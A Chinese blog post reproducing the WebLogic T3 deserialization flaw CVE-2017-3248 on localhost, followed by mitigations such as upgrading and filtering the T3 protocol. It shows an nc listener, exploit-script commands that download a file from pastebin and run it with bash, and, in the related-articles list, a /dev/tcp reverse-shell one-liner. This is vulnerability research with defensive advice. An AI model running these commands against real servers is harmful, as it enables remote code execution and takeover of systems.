WebLogic反序列化漏洞(CVE-2017-3248)

最新推荐文章于 2024-08-31 21:17:55 发布
最新推荐文章于 2024-08-31 21:17:55 发布
阅读量7.3k 收藏 2
点赞数
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/84246779
版权

参考:
https://paper.seebug.org/333/
环境安装
反弹shell参考:
https://w00troot.blogspot.com/2017/05/getting-reverse-shell-from-web-shell.html
weblogic在服务器命令行安装步骤参考:
https://blog.csdn.net/caiqiiqi/article/details/84231388

使用Java 7和Java 8均可成功复现。
漏洞复现
先启动weblogic(终端#1)
➜ base_domain ./startWebLogic.sh

在某端口监听(接收反弹shell)
➜ ysoserial nc -klv 7777

Listening on [0.0.0.0] (family 0, port 7777)

使用exploit进行利用

➜ weblogic git:(master) python2 exploit-CVE-2017-3248-bobsecq.py -t 127.0.0.1 -p 7001 --jip 127.0.0.1 --jport 4444 --cmd “wget https://pastebin.com/raw/a98rTvAM -O /tmp/shell” --ysopath /home/cqq/repos/ysoserial/ysoserial-master-v0.0.5-g16fc48b-20.jar
➜ weblogic git:(master) python2 exploit-CVE-2017-3248-bobsecq.py -t 127.0.0.1 -p 7001 --jip 127.0.0.1 --jport 4444 --cmd “/bin/bash /tmp/shell” --ysopath /home/cqq/repos/ysoserial/ysoserial-master-v0.0.5-g16fc48b-20.jar

工具来源:https://github.com/quentinhardy/scriptsAndExploits
在这里插入图片描述

解决方案:

  1. 升级 JDK 版本。由于 Java 在今年一月份以后更新了反序列化防御接口,可以缓解反序列化漏洞的影响。
  2. 升级 WebLogic 、删除不需要的页面,清理不安全的第三方库。
  3. 控制T3协议的访问

此漏洞产生于WebLogic的T3服务,因此可通过控制T3协议的访问来临时阻断针对该漏洞的攻击。当开放WebLogic控制台端口(默认为7001端口)时,T3服务会默认开启。

具体操作:

(1)进入WebLogic控制台,在base_domain的配置页面中,进入“安全”选项卡页面,点击“筛选器”,进入连接筛选器配置。
(2)在连接筛选器中输入:weblogic.security.net.ConnectionFilterImpl,在连接筛选器规则中输入:127.0.0.1 * * allow t3 t3s,0.0.0.0/0 * * deny t3 t3s(t3和t3s协议的所有端口只允许本地访问)。
(3)保存后需重新启动,规则方可生效。

caiqiiqi
关注
专栏目录
weblogicT3反序列化CVE-2017-3248&CVE-2018-2628&CVE-2018-3245
weixin_45682070的博客
03-13 5847
前言 上上篇文章我们分析了CVE-2015-4852、CVE-2016-0638、CVE-2016-3510的漏洞,因果是从resolveClass方法中出现的,resolveClass方法直接继承了父类的方法,然后没有任何过滤的造成了序列化漏洞,后面两个cve都是前者的绕过。今天分析一下CVE-2017-3248 & CVE-2018-2628,上上文中我们知道readClassDesc类描述方法可分为没有代理的类和代理类,CVE-2017-3248漏洞的成因就是代理类resolveProxyCl
WebLogic反序列化_CVE-2017-3248
09-06
WebLogic反序列化_CVE-2017-3248 java -jar weblogic_cmd.jar -C pwd -H 192.168.1.1 -P 7001 工具使用方法: -B Runtime Blind Execute Command maybe you should select os type -C (执行命令)Execute Command[need set] -dst path to dst file -H (执行主机)Remote Host[need set] -https enable https or tls -noExecPath custom execute path -os (操作系统类型)Os Type [windows,linux] -P (远程端口)Remote Port[need set] -shell enable shell module -src path to src file -T Payload Type[marshall, collection, streamMessageImpl] -U Uninstall rmi -upload enable upload a file
weblogic 反序列化CVE-2020-2883)
最新发布
qq_52579508的博客
08-31 739
描述: Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。“bash -i >& /dev/tcp/172.18.52.33/11111 0>&1” 这一段是需要进行编译的。前面是的 nc 监听 一直出问题 我的 监听ip 出错了 所以一直错 一直监听不到。后面换了windows 使用子系统去运行 poc poc 应该没问题 可能是 监听问题。用的kali 监听 很慢 一直返回不了 shell。
weblogic系列漏洞整理————6、反序列化漏洞CVE-2017-3248
Fly_鹏程万里
11-01 3235
0x01 漏洞描述 2017年1月27日,WebLogic 官方发布了一个编号为 CVEID: CVE-2017-3248 的漏洞,影响为 Critical 。之前轰动一时的反序列化漏洞,官方当时的修补措施,在本漏洞中可被绕过。此次漏洞影响 WebLogic 版本如下图所示: 0x02 漏洞分析与验证 分析之前 WebLogic 漏洞 CVE-2015-4852 的补丁,发现 WebLo...
CVE-2017-3248简单复现
ddr12231的博客
09-17 889
我是这样操作的 目标跟windows在一个段,linux是另一个段的,我的虚拟机 windows主机上 `java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 "wget http://11.205.242.98/32.txt" linux虚拟机上执行 python exploit-C...
CVE-2017-3248&CVE-2018-2628
一个安全研究员
05-27 2667
如题
WebLogic_CVE-2017-3248&&GetShell-CMD验证工具.rar
02-11
Weblogic任意命令执行的检测工具。 WebLogic_CVE-2017-3248文件夹的执行命令: java -jar weblogic_cmd.jar -C whoami -H 10.1.1.104 -P 8083 Weblogic Unserialization GetShll&CMD文件夹的执行命令: java -jar Weblogic-Unserialization-GetShll-CMD.jar 或者双击starter.bat.
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271"是针对这一特定漏洞的检测与防护解决方案。 首先,我们来理解什么是Java反序列化漏洞。在Java中,序列化是将对象的状态转化为...
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ)
01-09
然而,与所有软件一样,Weblogic也存在安全漏洞,其中CVE-2017-10271是一个著名的反序列化漏洞CVE-2017-10271漏洞源于Weblogic服务器中WLS-Windows-Autopatch组件处理特定类型输入的反序列化过程。这个组件是...
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ) 自己已经打上补丁了。欢迎下载
02-24
2017年,WebLogic服务器被发现存在一个名为CVE-2017-10271的安全漏洞,这是一个高危级别的反序列化漏洞。这个漏洞允许攻击者通过构造恶意的Java对象序列化数据,远程执行任意代码,从而控制受影响的系统。 **CVE-...
Weblogic+XML反序列化漏洞检查工具CVE-2017-10271+V1.2
05-21
好用的Weblogic XML 反序列化漏洞检查工具 CVE-2017-10271 使用范围Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.2.1.1.0版本 Oracle WebLogic Server 12.1.3.0.0版本
MiscSploits:其他漏洞利用脚本
05-08
其他漏洞利用脚本 Apigee_HTTP_Smuggling.md Apigee私有云-HTTP请求走私(无法修复) emc_networker_dos.py Dell EMC Networker服务器-缓冲区溢出PoC [CVE-2018-1218] TAC Xenta Traversal.txt 施耐德电气TAC Xenta 911/511-路径遍历和凭证提取 Jasper服务器路径Traversal.txt JasperReports Server 6.4.2路径遍历和用户枚举 WebLogicHelpSSRF.md WebLogic控制台帮助-未经身份验证的SSRF(CVE-2020-2766) PeopleSoftMulti.md Oracle PeopleSoft-多个漏洞(SSRF和XSS)[CVE-2019-3014,CVE-2019-3015,CVE-2019
2018最新weblogic反序列化漏洞补丁包
05-22
在p27395085_1036_Generic补丁的基础上再打上27453773_1036_Gener,解决CVE-2016-0638、CVE-2016-3510、CVE-2017-3248CVE-2018-2628
web反序列化漏洞原理_CVE-2017-3248——WebLogic反序列化初探_零开始网络安全技巧
程序员六七的博客
07-16 613
安全客 - 安全资讯平台
weblogicCVE-2017-3248CVE-2018-2628,CVE-2018-2893,CVE-2018-3245反序列绕过分析
weixin_30820151的博客
01-11 830
说一下复现CVE-2017-3248可以参考p牛的环境,p牛的环境CVE-2018-2628实际就是CVE-2017-3248,他漏洞编号这块写错了。 攻击流程就如下图,攻击者开启JRMPListener监听在1099端口,等待受害者链接,当受害者链接时,把gadgets返回给客户端: CVE-2017-3248以后的漏洞都是利用了JRMP java远程方法协议,利用java.rmi...
推荐开源项目:WebLogic CVE-2017-3248远程代码执行漏洞利用工具
gitblog_00075的博客
06-15 448
推荐开源项目:WebLogic CVE-2017-3248远程代码执行漏洞利用工具 项目地址:https://gitcode.com/quentinhardy/scriptsAndExploits 项目介绍 在网络安全研究的浩瀚星空中,一款名为exploit-CVE-2017-3248-bobsecq.py的脚本如星辰般璀璨。它专为针对“Oracle WebLogic RMI Registry U...
WebLogic漏洞pocsuite编写
公众号shadow sock7
04-20 1176
CVE-2019-2725 tested on: weblogic 12.1.3.0.0, jdk_1.7.0_80 weblogic 12.1.3.0.0, jdk_1.8.0_201 weblogic 10.3.6.0, jdk_1.6.0_45 (payload不一样) 适配windows和linux平台:
CVE-2017-3248——WebLogic反序列化漏洞利用工具
weixin_30628801的博客
07-20 886
著名的web中间件WebLogic被曝出之前的反序列化安全漏洞补丁存在绕过安全风险,用户更新补丁后,仍然存在被绕过成功执行远程命令攻击的情况,安全风险高,Oracle官方及时发布了最新补丁,修复了该漏洞,阿里云安全团队建议用户尽快自查并升级。 具体详情如下: 漏洞编号: CVE-2017-3248 漏洞名称: WebLogic 反序列化漏洞 官方评级: 高危 漏洞描述: Or...
Weblogic安全漫谈(二)
moresec的博客
01-03 1308
分析开启T3反序列化魔盒后的修复与绕过。
利用POC检测WebLogic反序列化漏洞CVE-2019-2725
在2019年,Oracle WebLogic服务器遭遇了一个严重的反序列化漏洞,即CVE-2019-2725。这个漏洞允许攻击者通过精心构造的恶意请求,利用WebLogic应用程序中的序列化功能来执行任意代码,从而获取系统控制权限。由于其...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值